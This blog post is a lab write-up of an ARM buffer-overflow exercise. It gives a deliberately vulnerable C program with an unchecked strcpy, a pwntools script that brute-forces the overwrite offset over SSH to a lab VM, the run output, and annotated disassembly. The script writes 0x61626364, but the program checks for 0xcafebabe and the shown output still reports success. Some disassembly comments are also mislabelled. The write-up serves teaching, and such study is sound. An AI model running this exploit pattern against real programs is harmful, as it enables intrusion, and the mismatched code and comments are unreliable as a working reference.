DEV Community

Cover image for ARM BOF, überwrite stack data
hextrace
hextrace

Posted on

ARM BOF, überwrite stack data

In this second protoarm exercise, we'll exploit a buffer overflow to write arbitary data onto the stack. The goal is to rewrite the vulnerable integer to 0xcafebabe. Here is the vulnerable program:

#include <stdio.h>
#include <string.h>
#include <err.h>

int main(int argc, char**argv)
{
    volatile int vulnerable;
    char buffer[64];

    if (argc == 1)
        errx(1, "argument missing\n");

    vulnerable = 0;
    strcpy(buffer, argv[1]);

    if (vulnerable == 0xcafebabe)
        printf("congratulations\n");
    else
        printf("nope");
}
Enter fullscreen mode Exit fullscreen mode

We can write the following exploit, based on the previous one:

#!/usr/bin/env python3

import struct
from pwn import *


socket = ssh(host='192.168.0.1', user='root', password='')

i = 60
while True:
    i += 1
    print('test', i)
    payload = b'A' * i + struct.pack('<I', 0x61626364)
    process = socket.process(
        argv=['/root/protostarm/stack1/stack1', payload ],
    )
    res = process.recv().decode()
    print('res =', res)
    process.close()
    if 'congratulations' in res:
        break

socket.close()
Enter fullscreen mode Exit fullscreen mode

And there we go, the congratulations output:

user@Azeria-Lab-VM:~/protoarm/stack1$ ./exploit.py 
[+] Connecting to 192.168.0.1 on port 22: Done
[*] root@192.168.0.1:
    Distro    Debian testing
    OS:       linux
    Arch:     arm
    Version:  4.9.0
    ASLR:     Enabled
test 61
[+] Starting remote process '/root/protostarm/stack1/stack1' on 192.168.0.1: pid 1585
res = nope

[*] Stopped remote process 'stack1' on 192.168.0.1 (pid 1585)
test 62
[+] Starting remote process '/root/protostarm/stack1/stack1' on 192.168.0.1: pid 1589
res = nope

[*] Stopped remote process 'stack1' on 192.168.0.1 (pid 1589)
test 63
[+] Starting remote process '/root/protostarm/stack1/stack1' on 192.168.0.1: pid 1593
res = nope

[*] Stopped remote process 'stack1' on 192.168.0.1 (pid 1593)
test 64
[+] Starting remote process '/root/protostarm/stack1/stack1' on 192.168.0.1: pid 1597
res = congratulations

[*] Stopped remote process 'stack1' on 192.168.0.1 (pid 1597)
[*] Closed connection to '192.168.0.1'
Enter fullscreen mode Exit fullscreen mode

Again, we bruteforced the correct offset but it can be found by reading at the disassembly:

00000564 <main>:
epilog:
 564:   b580            push    {r7, lr}
 566:   b094            sub     sp, #80 ; 0x50      ; reserve 0x50 bytes for the stack
 568:   af00            add     r7, sp, #0      ; r7 = sp
 56a:   6078            str     r0, [r7, #4]        ; r0 = argv[0]
 56c:   6039            str     r1, [r7, #0]        ; r1 = argc
 56e:   687b            ldr     r3, [r7, #4]
 570:   2b01            cmp     r3, #1
 572:   d105            bne.n   580 <main+0x1c>

error:
 574:   4b13            ldr     r3, [pc, #76]       ; (5c4 <main+0x60>)
 576:   447b            add     r3, pc
 578:   4619            mov     r1, r3
 57a:   2001            movs    r0, #1          ; EXIT_FAILURE
 57c:   f7ff ef5e       blx     43c <errx@plt>

read_and_compare_input:
 580:   2300            movs    r3, #0
 582:   64fb            str     r3, [r7, #76]
 584:   683b            ldr     r3, [r7, #0]
 586:   3304            adds    r3, #4
 588:   681a            ldr     r2, [r3, #0]        ; r2 = argv[1]
 58a:   f107 030c       add.w   r3, r7, #12     ; r3 = buffer of 76-12=64 bytes
 58e:   4611            mov     r1, r2
 590:   4618            mov     r0, r3
 592:   f7ff ef3c       blx     40c <strcpy@plt>    ; strcpy(buffer, argv[1]);
 596:   6cfa            ldr     r2, [r7, #76]       ; r2 = vulnerable
 598:   f246 3364       movw    r3, #47806          ; set lower bits of r3 to 0xbabe
 59c:   f2c6 1362       movt    r3, #51966          ; se higher bits fo r3 to 0xcafe
 5a0:   429a            cmp     r2, r3          ; vulnerable == 0xcafebabe?
 5a2:   d105            bne.n   5b0 <main+0x4c>

good_boy:
 5a4:   4b08            ldr     r3, [pc, #32]       ; (5c8 <main+0x64>)
 5a6:   447b            add     r3, pc
 5a8:   4618            mov     r0, r3
 5aa:   f7ff ef36       blx     418 <puts@plt>      ; puts("congratulations\n");

jump_to_epilog:
 5ae:   e004            b.n     5ba <main+0x56>

bad_boy:
 5b0:   4b06            ldr     r3, [pc, #24]       ; (5cc <main+0x68>)
 5b2:   447b            add     r3, pc
 5b4:   4618            mov     r0, r3
 5b6:   f7ff ef30       blx     418 <puts@plt>      ; puts ("nope\n");

epilog:
 5ba:   2300            movs    r3, #0
 5bc:   4618            mov     r0, r3          ; return 0;
 5be:   3750            adds    r7, #80 ; 0x50
 5c0:   46bd            mov     sp, r7
 5c2:   bd80            pop     {r7, pc}


literal pool:
 5c4:   000000a6
 5c8:   0000008a
 5cc:   0000008e
Enter fullscreen mode Exit fullscreen mode

Top comments (0)